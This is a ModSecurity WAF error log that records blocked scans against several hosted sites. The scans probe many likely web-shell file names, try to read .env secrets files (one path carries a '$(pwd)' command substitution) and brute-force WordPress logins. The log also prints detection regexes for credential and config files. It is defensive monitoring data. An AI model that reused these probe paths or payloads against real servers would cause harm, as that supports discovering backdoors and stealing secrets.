[Tue May 26 19:53:21.841248 2026] [security2:error] [pid 86490:tid 86682] [client 74.249.173.207:4918] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/aaa.php"] [unique_id "ahWs2VZMwN0DpLVWo6KmlAAAAMM"]
[Tue May 26 19:53:21.841402 2026] [security2:error] [pid 86490:tid 86682] [client 74.249.173.207:4918] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/aaa.php"] [unique_id "ahWs2VZMwN0DpLVWo6KmlAAAAMM"]
[Tue May 26 19:53:21.970143 2026] [security2:error] [pid 86490:tid 86681] [client 74.249.173.207:38930] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/Ov-Simple1.php"] [unique_id "ahWs2VZMwN0DpLVWo6KmngAAAMI"]
[Tue May 26 19:53:21.970221 2026] [security2:error] [pid 86490:tid 86681] [client 74.249.173.207:38930] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/Ov-Simple1.php"] [unique_id "ahWs2VZMwN0DpLVWo6KmngAAAMI"]
[Tue May 26 19:53:22.089955 2026] [security2:error] [pid 86490:tid 86666] [client 74.249.173.207:4185] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/a5.php"] [unique_id "ahWs2lZMwN0DpLVWo6KmpQAAALM"]
[Tue May 26 19:53:22.090059 2026] [security2:error] [pid 86490:tid 86666] [client 74.249.173.207:4185] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/a5.php"] [unique_id "ahWs2lZMwN0DpLVWo6KmpQAAALM"]
[Tue May 26 19:53:22.100252 2026] [security2:error] [pid 86490:tid 86687] [client 185.177.72.53:12280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/fix/.env"] [unique_id "ahWs2lZMwN0DpLVWo6KmpwAAAMg"]
[Tue May 26 19:53:22.133462 2026] [security2:error] [pid 86490:tid 86746] [client 146.174.166.177:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWs2VZMwN0DpLVWo6KmkgAAAQM"]
[Tue May 26 19:53:22.236317 2026] [security2:error] [pid 86490:tid 86705] [client 74.249.173.207:38928] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/hplfuns.php"] [unique_id "ahWs2lZMwN0DpLVWo6KmrQAAANo"]
[Tue May 26 19:53:22.236415 2026] [security2:error] [pid 86490:tid 86705] [client 74.249.173.207:38928] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/hplfuns.php"] [unique_id "ahWs2lZMwN0DpLVWo6KmrQAAANo"]
[Tue May 26 19:53:22.267591 2026] [security2:error] [pid 86490:tid 86713] [client 185.177.72.53:12280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/mnt/.env"] [unique_id "ahWs2lZMwN0DpLVWo6KmsQAAAOI"]
[Tue May 26 19:53:22.363953 2026] [security2:error] [pid 86490:tid 86658] [client 74.249.173.207:4218] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/bolt.php"] [unique_id "ahWs2lZMwN0DpLVWo6KmtgAAAKs"]
[Tue May 26 19:53:22.364075 2026] [security2:error] [pid 86490:tid 86658] [client 74.249.173.207:4218] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/bolt.php"] [unique_id "ahWs2lZMwN0DpLVWo6KmtgAAAKs"]
[Tue May 26 19:53:22.574226 2026] [security2:error] [pid 86490:tid 86664] [client 74.249.173.207:4882] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahWs2lZMwN0DpLVWo6KmuwAAALE"]
[Tue May 26 19:53:22.574321 2026] [security2:error] [pid 86490:tid 86664] [client 74.249.173.207:4882] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahWs2lZMwN0DpLVWo6KmuwAAALE"]
[Tue May 26 19:53:22.606496 2026] [security2:error] [pid 86490:tid 86662] [client 185.177.72.53:12280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/$(pwd)/.env"] [unique_id "ahWs2lZMwN0DpLVWo6KmvAAAAK8"]
[Tue May 26 19:53:22.704247 2026] [security2:error] [pid 86490:tid 86644] [client 74.249.173.207:4567] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/file2.php"] [unique_id "ahWs2lZMwN0DpLVWo6KmwwAAAJ0"]
[Tue May 26 19:53:22.704349 2026] [security2:error] [pid 86490:tid 86644] [client 74.249.173.207:4567] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/file2.php"] [unique_id "ahWs2lZMwN0DpLVWo6KmwwAAAJ0"]
[Tue May 26 19:53:22.829457 2026] [security2:error] [pid 86490:tid 86710] [client 74.249.173.207:4194] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/index/function.php"] [unique_id "ahWs2lZMwN0DpLVWo6KmxQAAAN8"]
[Tue May 26 19:53:22.829570 2026] [security2:error] [pid 86490:tid 86710] [client 74.249.173.207:4194] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/index/function.php"] [unique_id "ahWs2lZMwN0DpLVWo6KmxQAAAN8"]
[Tue May 26 19:53:22.952781 2026] [security2:error] [pid 86490:tid 86631] [client 74.249.173.207:4893] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/wk/index.php"] [unique_id "ahWs2lZMwN0DpLVWo6KmzQAAAJA"]
[Tue May 26 19:53:22.952907 2026] [security2:error] [pid 86490:tid 86631] [client 74.249.173.207:4893] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/wk/index.php"] [unique_id "ahWs2lZMwN0DpLVWo6KmzQAAAJA"]
[Tue May 26 19:53:23.075986 2026] [security2:error] [pid 86490:tid 86723] [client 74.249.173.207:4921] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/alfa.php"] [unique_id "ahWs21ZMwN0DpLVWo6Km0QAAAOw"]
[Tue May 26 19:53:23.076096 2026] [security2:error] [pid 86490:tid 86723] [client 74.249.173.207:4921] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/alfa.php"] [unique_id "ahWs21ZMwN0DpLVWo6Km0QAAAOw"]
[Tue May 26 19:53:23.203562 2026] [security2:error] [pid 86490:tid 86636] [client 74.249.173.207:38955] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/wp-theme.php"] [unique_id "ahWs21ZMwN0DpLVWo6Km1gAAAJU"]
[Tue May 26 19:53:23.203698 2026] [security2:error] [pid 86490:tid 86636] [client 74.249.173.207:38955] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/wp-theme.php"] [unique_id "ahWs21ZMwN0DpLVWo6Km1gAAAJU"]
[Tue May 26 19:53:23.285023 2026] [security2:error] [pid 86490:tid 86731] [client 185.177.72.53:12280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/fastapi-app/client/.env"] [unique_id "ahWs21ZMwN0DpLVWo6Km2gAAAPQ"]
[Tue May 26 19:53:23.326114 2026] [security2:error] [pid 86490:tid 86686] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWs2lZMwN0DpLVWo6KmywAAAMc"]
[Tue May 26 19:53:23.331469 2026] [security2:error] [pid 86490:tid 86624] [client 74.249.173.207:4217] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/wp-file.php"] [unique_id "ahWs21ZMwN0DpLVWo6Km2wAAAIk"]
[Tue May 26 19:53:23.331547 2026] [security2:error] [pid 86490:tid 86624] [client 74.249.173.207:4217] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/wp-file.php"] [unique_id "ahWs21ZMwN0DpLVWo6Km2wAAAIk"]
[Tue May 26 19:53:23.531820 2026] [security2:error] [pid 86490:tid 86625] [client 74.249.173.207:4173] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/default.php"] [unique_id "ahWs21ZMwN0DpLVWo6Km4gAAAIo"]
[Tue May 26 19:53:23.531924 2026] [security2:error] [pid 86490:tid 86625] [client 74.249.173.207:4173] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/default.php"] [unique_id "ahWs21ZMwN0DpLVWo6Km4gAAAIo"]
[Tue May 26 19:53:23.679431 2026] [security2:error] [pid 86490:tid 86663] [client 74.249.173.207:38936] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/mah.php"] [unique_id "ahWs21ZMwN0DpLVWo6Km5wAAALA"]
[Tue May 26 19:53:23.679565 2026] [security2:error] [pid 86490:tid 86663] [client 74.249.173.207:38936] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/mah.php"] [unique_id "ahWs21ZMwN0DpLVWo6Km5wAAALA"]
[Tue May 26 19:53:23.807520 2026] [security2:error] [pid 86490:tid 86665] [client 74.249.173.207:4186] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/plugins.php"] [unique_id "ahWs21ZMwN0DpLVWo6Km7AAAALI"]
[Tue May 26 19:53:23.807681 2026] [security2:error] [pid 86490:tid 86665] [client 74.249.173.207:4186] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/plugins.php"] [unique_id "ahWs21ZMwN0DpLVWo6Km7AAAALI"]
[Tue May 26 19:53:24.063955 2026] [security2:error] [pid 86490:tid 86704] [client 74.249.173.207:4917] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/sf.php"] [unique_id "ahWs3FZMwN0DpLVWo6Km9wAAANk"]
[Tue May 26 19:53:24.064060 2026] [security2:error] [pid 86490:tid 86704] [client 74.249.173.207:4917] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/sf.php"] [unique_id "ahWs3FZMwN0DpLVWo6Km9wAAANk"]
[Tue May 26 19:53:24.135695 2026] [security2:error] [pid 86490:tid 86682] [client 185.177.72.53:12280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/index.php.copy"] [unique_id "ahWs3FZMwN0DpLVWo6Km-AAAAMM"]
[Tue May 26 19:53:24.231704 2026] [security2:error] [pid 86490:tid 86694] [client 74.249.173.207:38924] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/a.php"] [unique_id "ahWs3FZMwN0DpLVWo6Km-wAAAM8"]
[Tue May 26 19:53:24.231800 2026] [security2:error] [pid 86490:tid 86694] [client 74.249.173.207:38924] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/a.php"] [unique_id "ahWs3FZMwN0DpLVWo6Km-wAAAM8"]
[Tue May 26 19:53:24.302936 2026] [security2:error] [pid 86490:tid 86711] [client 185.177.72.53:12280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/sEnDgRiD/.eNv"] [unique_id "ahWs3FZMwN0DpLVWo6KnAQAAAOA"]
[Tue May 26 19:53:24.447710 2026] [security2:error] [pid 86490:tid 86690] [client 74.249.173.207:4219] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/k.php"] [unique_id "ahWs3FZMwN0DpLVWo6KnBQAAAMs"]
[Tue May 26 19:53:24.447810 2026] [security2:error] [pid 86490:tid 86690] [client 74.249.173.207:4219] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/k.php"] [unique_id "ahWs3FZMwN0DpLVWo6KnBQAAAMs"]
[Tue May 26 19:53:24.487345 2026] [security2:error] [pid 86490:tid 86669] [client 62.60.130.233:60498] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "g.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWs3FZMwN0DpLVWo6KnAAAAALY"], referer: https://www.google.jp/search?q=wordpress
[Tue May 26 19:53:24.614813 2026] [security2:error] [pid 86490:tid 86636] [client 74.249.173.207:4188] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/ini.php"] [unique_id "ahWs3FZMwN0DpLVWo6KnCgAAAJU"]
[Tue May 26 19:53:24.614918 2026] [security2:error] [pid 86490:tid 86636] [client 74.249.173.207:4188] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/ini.php"] [unique_id "ahWs3FZMwN0DpLVWo6KnCgAAAJU"]
[Tue May 26 19:53:24.786791 2026] [security2:error] [pid 86490:tid 86731] [client 74.249.173.207:38916] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/ca4.php"] [unique_id "ahWs3FZMwN0DpLVWo6KnDwAAAPQ"]
[Tue May 26 19:53:24.786927 2026] [security2:error] [pid 86490:tid 86731] [client 74.249.173.207:38916] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/ca4.php"] [unique_id "ahWs3FZMwN0DpLVWo6KnDwAAAPQ"]
[Tue May 26 19:53:24.838693 2026] [security2:error] [pid 86490:tid 86716] [client 62.60.130.233:63245] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "g.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWs3FZMwN0DpLVWo6KnFwAAAOU"], referer: https://wordpress.org/
[Tue May 26 19:53:24.926339 2026] [security2:error] [pid 86490:tid 86625] [client 74.249.173.207:4212] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/wp-admin/includes/index.php"] [unique_id "ahWs3FZMwN0DpLVWo6KnGwAAAIo"]
[Tue May 26 19:53:24.926447 2026] [security2:error] [pid 86490:tid 86625] [client 74.249.173.207:4212] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/wp-admin/includes/index.php"] [unique_id "ahWs3FZMwN0DpLVWo6KnGwAAAIo"]
[Tue May 26 19:53:25.052151 2026] [security2:error] [pid 86490:tid 86658] [client 74.249.173.207:4904] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/wp-info.php"] [unique_id "ahWs3VZMwN0DpLVWo6KnHQAAAKs"]
[Tue May 26 19:53:25.052280 2026] [security2:error] [pid 86490:tid 86658] [client 74.249.173.207:4904] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/wp-info.php"] [unique_id "ahWs3VZMwN0DpLVWo6KnHQAAAKs"]
[Tue May 26 19:53:25.180348 2026] [security2:error] [pid 86490:tid 86702] [client 74.249.173.207:4179] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/init.php"] [unique_id "ahWs3VZMwN0DpLVWo6KnIgAAANc"]
[Tue May 26 19:53:25.180452 2026] [security2:error] [pid 86490:tid 86702] [client 74.249.173.207:4179] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/init.php"] [unique_id "ahWs3VZMwN0DpLVWo6KnIgAAANc"]
[Tue May 26 19:53:25.310874 2026] [security2:error] [pid 86490:tid 86732] [client 74.249.173.207:38913] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/100.php"] [unique_id "ahWs3VZMwN0DpLVWo6KnLQAAAPU"]
